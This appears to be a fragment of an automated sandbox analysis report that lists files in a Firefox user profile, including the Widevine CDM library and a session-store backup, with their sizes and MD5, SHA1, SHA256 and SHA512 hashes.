C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5d8815eaa170fa08c695ec51bb6b26793
SHA1115dc45814d2ed1d0e0aec9bcc85eb1f224de209
SHA2568e50b437172c6c4532ccc7435586345d8c3c3eba253bae9219654dc01f46e106
SHA5125c6b26403d4bbe4e70149c7844896de0cacfcd1f6e4d73cf4206f2bdede77bc53a3843fcb192adab93d8a11fc396fd19157c6d2480ee850f9b7e1d27100e0b06
-
Filesize
10KB
MD564ccb81d7f83a15349ee831976ff3791
SHA1b46fd9954cef82008f65cf5e13090700bf5150e8
SHA256838a512eec19b89a259849ba6ddec63955c30f18fa7abbcaa75f27e4482cd416
SHA512dc2001e6cf98d48daa4ccf979f41ccfac86b194e9a749d2b09fd70ee4fece319cfd3a9f9a48186d338208803df37f7db3cdca7baec5a84576f9d323e5d00592b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD545fee6d6b32735b40021c31108ff7a30
SHA18ae13b2c997ad7820c730834c9fa755a93447c57
SHA25615488443f79e0dd54ba0f03d689a839287dbcbe6141eb460eae3dd592a29d219
SHA5120d7d34569e759e84d72d79efc24457205cc90bfb7eb1acb5d765059120d1b8604a6e7434ce898dec087b412e6bcd397bf6a37db240b8c1aa25cde91b2a86f0ba